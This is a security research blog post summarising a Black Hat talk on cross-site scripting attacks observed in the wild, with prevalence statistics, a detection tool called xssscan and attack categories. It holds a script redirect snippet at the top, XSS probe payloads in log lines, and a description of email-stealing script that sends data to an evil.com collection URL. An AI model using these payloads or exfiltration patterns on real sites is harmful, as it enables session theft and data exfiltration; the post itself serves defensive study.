<SCRIPT> var str1 = "http://"; var str2 = "www.modsecurity.org"; var str3 = "/beacon.html"; var result = str1 + str2 + str3; window.location=result</SCRIPT>
For those of you who were not able to make it to our talk at Blackhat USA, this blog post provides an overview of the information presented. This was a joint presentation by Trustwave SpiderLabs Research Team and Microsoft's Security Research and Defense Team.
This is part 1 of a 2 part blog post. In this installment, we will discuss example XSS attacks captured in the wild and also some statistics. In part 2, we will discuss XSS Defense Techniques.
XSS: Vulnerability Prevalence
OWASP Top 10 2013
The latest OWASP Top 10 Web Applications Risk Project lists the following risk graphic for XSS:
As you can see from this graphic, the PREVALENCE of XSS across all applications tested is VERY WIDESPREAD.
Trustwave Global Security Report
In the latest Trustwave Global Security Report, the SpiderLabs App-Pentest Team generated the following list of top vulnerabiities identified in the last year during their engagements:
Again, XSS is listed as the top vulnerability identified.
XSS: Attack Liklihood
The previous section provided metrics to support the theory that we already know - XSS vulnerabilities are rampant. What we wanted to focus on for our research was this - HOW are XSS vulnerabilities being exploited in the wild?
XSS Attack Data Sources
In order to find real-world attack data, we analyzed a variety of resources:
- Webserver/proxy logs
- Webapplication firewall logs
- URLshortening services
- Chatrooms, IRC traffic
- Commentson pages
- URLreputation services
All of this data together yielded approximately:
- 100s TB of raw data
- 10s TB of URLs
XSS Attack Data Analysis
So, how did we analyze this data for XSS attacks? Greg created a toolset called detectXSSlib:
- Generalpurpose library written in C
- Basedon a subset of OWASP CRS rules (IE XSS Filters)
- Optimizedfor performance
- Rulesselected on the base of empirical data
- Commandline tool provided (xssscan)
- Easyto integrate with other components
- nginxmodule PoCprovided
The xssscan comamnd line tool can be used like this:
# ./xssscan xssscan ver 1.0 (c) 2013 Greg Wroblewski Command line tool for detection of XSS attacks in URLs. Based on ModSecurity rules from OWASP CRS.Optimized for performance and large scale data mining. Usage:xssscan [-t] [-r] [-x] <URL>xssscan [-a] [-d] [-r] [-x] -f <TEXT_FILE_WITH_URLS> Options: -a - in output replace host names with www.example.com -d - deduplicate URLs by same host name -r - show rule number for detected XSS (for statistics or debugging) -t - show tokens of parsed URL (useful for debugging only) -x - list only URLs where XSS was not detected (default: was detected)# ./xssscan -f /var/log/apache2/access.log172.16.209.1 - - [24/Jul/2013:10:40:40 -0400] "GET /wordpress/?s=%3Cscript%3Eprompt%28%22TEST%22%29%3B%3C%2Fscript%3EHTTP/1.1" 200 2155 "http://172.16.209.131/wordpress/?s=%3Cimg+src%3D1+onerror%3Dalert%28%27XSS%27%29%3E""Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0"
Sanitized Example Attack Data
Sanitized XSS attack data is found here in Greg's GitHub Repo. Here is a small snippet of real-world attack data:
XSS Attack Examples: Proof-of-Concept Testing
Many XSS attacks are simple probes that test for the existence of missing output encoding defenses, for example:
These tests fall into the following categories:
- Scanning tools
- Scanning tools
- Going after bug bounty
- Internal testing
XSS Attack Examples: Defacements
Website defacements were another popular outcome for using XSS attacks. Here is an example attack payload:
This attack resulted in a defacement similar to the following screenshot:
XSS Attack Examples: Cookie Stealing
This is the first XSS attack category that directly negatively impacts web application users. Here is an example attack payload:
In line #1 - the attacker sends the XSS payload in a parameter that overrides the Referer data echoed back in the response to execute JS code. This code would instruct the browser to download the wwgw8k5srago.js file. This file contains the data in ine #2 which instructs the browser to make a request to the nwwgw8k5sra.gif URL and to pass the document.cookie DOM data as a parameter. If this attack is successful, the attacker can quickly use the application SessionID cookie value to log into the application at the victim user.
XSS Attack Examples: In-Session Phishing
***This example uses an XSS vulnerability in Hotmail that has since been fixed.***
If attackers can identify XSS vulnerabilities within web-based email providers, then they can send targeted Phishing emails to users. Take a look at the example exploit code:
In this instance, if I was logged into Hotmail and received the Phishing email, the JS code would trigger the onerror event call and issue a jQuery call to the attacker site which would present me with the following fake login page:
If the victim fall for this attack, their credentials will be sent to the attacker's site. Wehave seen at least 10 different instances of this typeof attack, usually launched on e-mail providers and financial institutions,very often carefully prepared with localized login screens, well concealedpassword delivery servers, etc.
XSS Attack Examples: Data Exfiltration
With a successful attack, script runs in browser in current session of the victim. The scriptcould hijack and upload to attackers entire on-line content accessible fromcurrent session. Examples:list of contacts, e-mails, attachments, calendar, files, etc... Aftersuccessful upload script re-directs to phishing page to get victim'scredentials (address bar does not change!)
In one case of the attack, the script wehave seen had 10s of kB ofcode, and even included interesting left-over comments. How nice.
Thescript was able to enumeratethrough multiple pages of e-mail boxes, extract e-mail data, includingattachments, and also steal contact list. Script was able to:
- Enumerate through last 60 pages worth ofe-mail
- Extract the From, Subject, and Body of the e-mail by using the same calls aswould be triggered if user were to view the e-mails
- Inject new script elements with sourceset to the URL containing the next chunk of the data read from the file.
- Send data in chunks to http://evil.com/hotmail_xss.php?u=<email>&msg= <subject+from>^^<segmentindex>^^<next segment of message body>
- Fetch content off of inbox/sent/drafts.
- Clean up : mark messages that were notoriginally read as unread
Theupload process was also not trivial,leveraging data chunking.
XSS Attack Statistics
# of Successful XSS Attacks per TLD
We have seen at least one sample of working attack for almost every single TLD out there.
Successful XSS Attacks Over Time
Theintensity of attacks remained on the constantlevel over the time we were able to monitor them consistently.
Prevalence of XSS Attacks (based on Alexa Top N list)
Wellover 6% of top 1,000 websites had a successful XSS attack.
Part 1 Conclusion
As we have outlined in Part 1 of this blog post, XSS attacks are real. They range in severity and impact depending on what your business model is and who your customers are however outcomes such as account hijacking and data exfiltration are serious issues.
How do we protect against XSS attacks? Stay tuned for Part 2 where I will provide an overview of tactical XSS defenses which can be used in production to help mitigate exposures.